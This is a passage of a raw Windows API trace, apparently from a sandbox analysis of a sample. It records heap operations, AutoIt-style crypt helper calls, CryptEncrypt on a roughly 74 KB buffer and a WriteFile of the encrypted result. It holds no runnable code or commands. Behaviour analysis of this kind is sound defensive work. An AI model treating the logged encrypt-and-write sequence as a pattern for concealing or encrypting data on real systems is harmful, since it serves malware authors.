lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0468 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03c8 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0117.170] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0117.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0117.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0117.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0117.171] CryptGetKeyParam (in: hKey=0x41ac740, dwParam=0x7, pbData=0x43e2b20, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2b20*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0117.171] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.171] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.171] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.171] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.171] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0117.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0117.171] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x12108, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x12110) returned 1 [0117.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0117.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0117.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0300 [0117.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0117.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0117.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0117.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0117.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0117.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0117.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0117.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0117.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0117.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0117.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0117.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0117.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0117.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0117.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0117.173] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0117.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0117.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0117.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0558 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03f0 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0710 [0117.230] CharLowerBuffW (in: lpsz="byte[74001]", cchLength=0xb | out: lpsz="byte[74001]") returned 0xb [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0117.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12111) returned 0x49ac118 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0468 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0117.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12108) returned 0x49be238 [0117.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0117.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12108) returned 0x49d0348 [0117.234] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.234] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0117.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0117.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0117.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0117.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0117.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cb0a8 [0117.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb0a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0117.234] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49ac118*, pdwDataLen=0x144e088*=0x12108, dwBufLen=0x12110 | out: pbData=0x49ac118*, pdwDataLen=0x144e088*=0x12110) returned 1 [0117.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0117.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea268 [0117.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03f0 [0117.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0117.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0117.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0117.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0117.234] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.234] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.235] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.235] WriteFile (in: hFile=0x298, lpBuffer=0x4528128*, nNumberOfBytesToWrite=0x12110, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4528128*, lpNumberOfBytesWritten=0x144ea8c*=0x12110, lpOverlapped=0x0) returned 1 [0117.237] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0117.237] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.237] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0117.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0117.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0117.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0117.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0117.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0117.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cad18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0117.237] CryptDestroyKey (hKey=0x41ac740) returned 1 [0117.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0117.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0117.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0117.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0117.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0117.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0117.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0117.237] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.237] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.238] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.238] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.238] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0117.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0117.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0117.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0117.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0117.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0117.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797008, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0117.238] CryptReleaseContext (hProv=0x41a4150, dwFlags=0x0) returned 1 [0117.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0117.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0117.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabb0 [0117.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0117.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0117.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0117.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0117.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.239] FreeLibrary (hLibModule=0x756e0000) returned 1 [0117.239] CloseHandle (hObject=0x258) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eaa90 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0117.239] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0117.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0117.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0117.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0117.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0117.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad18 [0117.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0117.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0117.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caca0 [0117.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab38 [0117.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0117.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0117.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0117.240] HeapFree (in: 